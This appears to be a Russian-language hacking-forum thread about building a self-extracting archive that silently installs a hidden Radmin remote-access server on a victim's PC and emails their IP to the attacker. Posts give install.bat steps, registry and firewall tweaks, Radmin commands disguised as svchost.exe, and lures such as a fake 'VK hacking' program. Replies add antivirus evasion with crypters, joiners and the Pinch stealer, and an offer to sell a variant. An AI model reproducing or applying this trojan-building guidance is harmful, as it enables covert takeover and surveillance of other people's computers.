Сборка от меня для тех кому лень перечитывать сотни страниц фака по этой теме. Все файлы надо добавить в SFX архив и в свойствах указать выполнить после распаковки install.bat далее при запуски архива...вы не увидите ничего)Это работа утилиты CMDow которая запускает cmd в скрытом режиме. что же происходит в данный момент? архив распаковывает файлы файлы для радмина копирует в windows, файлы почтовой утилиты в windows\system32\ , добавляет записи в реестре чтобы радминсервер не было видно,чтоб не ругался виндфаерволл, запускает радминсервер , и отдаёт команду на отсылку ip на ваш почтовый адрес. после того,как программа выполнится,все распакованные файлы удаляются. Как пользоваться? В файле install.bat надо прописать адрес логин и пароль вашей почты,а так же строку с паролем от радмина (по умолчанию пароля нет).далее создаём самораспаковывающийся архив, и кидаем его жертве. Чтобы не было так паливно,можно прописать в install.bat удаление самого архива и запуск какой-нибудь проги,установщик которой вы добавите в архив,например "Взлом_Вконтакте.exe" Дописывайте,корректируйте под свои нужды,я лишь выкладываю основу,далее всё зависит от вашей фантазии P.S. готовый sfx архив не возможно передать по почте,говорит найден вирус)как это обойти,каждый додумывается сам. http://www.filehoster.ru/files/bx3443 никаких вирусов там нет,архив обычный
использование батников палится антивирусниками... имхо - этот способ устарел с тех пор, как ушла из жизни винда 95/98, поэтому см пост http://forum.antichat.ru/showpost.php?p=1041809&postcount=227
незнаю,всё проверил,каспер непалит,только вот ип на почту неприходит)) а тк у нас тут у всех ип динамический,приходится каждый раз просить прислать картинку в аське))))) есть какойнить способ узнать ип удаленно?
есть способ , я делаю так : радмин (моя сборка) +pinch, этот радмин перебивает уже установленный радмин на мой пароль и не виден в трее , что очень удобно . 2 qazer способ устарел , протестил на 6 компах везде палево , опять же говорю радмин (моя сборка) +pinch+криптор+джойнер и будет всё very good 2 qazer а то что писал +
У меня сейчас заказ: создать сборку, в которой отправка IP жертвы будет производиться на номер ICQ. Выложу позже на Плати.ру - кто захочет, тот приобритет. Спросите почему платно? Отвечу: после изменений в протоколе icq (ведь все обновляли квип до 8080? кто обновлял - поймет меня) довольно трудно написать что-то работающее, чтобы оно отправляло что-то куда-то (я использую делфи 7й версии)
так не понял, как отправляет на почту IP ? SMTP (25 Порт?)? а если стоит файрвол и у клиента нет аутлук ? (например у меня не стоит никакого почтового клиента).
там в сборке консольный почтовый клиент есть,который всё и отправляет юкстати там в настройках указан альтернативный порт (можно переделать на 25ый)
Кто нить тестил? А то я нуб и оажется что это вдруг еще не работает, а если это работает - буду рабираться, отзовитесь кто тестил
делаешь sfx архив там на вкладке дополнительно есть строчка после распаковки выполнить и пишешь туда имя файла
Я добавил пароль к радмину такой командой: Code: "%SYSTEMROOT%/svchost.exe" /save /silence /pass:тут_пишешь_пароль /port:тут_пишешь_порт Пишешь эту команду сразу после строчки Code: "%SYSTEMROOT%/help/Tours/mmTour/svchost.exe" /install /silence Но почта не работает. Может быть это связано с тем, что я юзаю gmail.com, а у них защищенное TSL соеденение?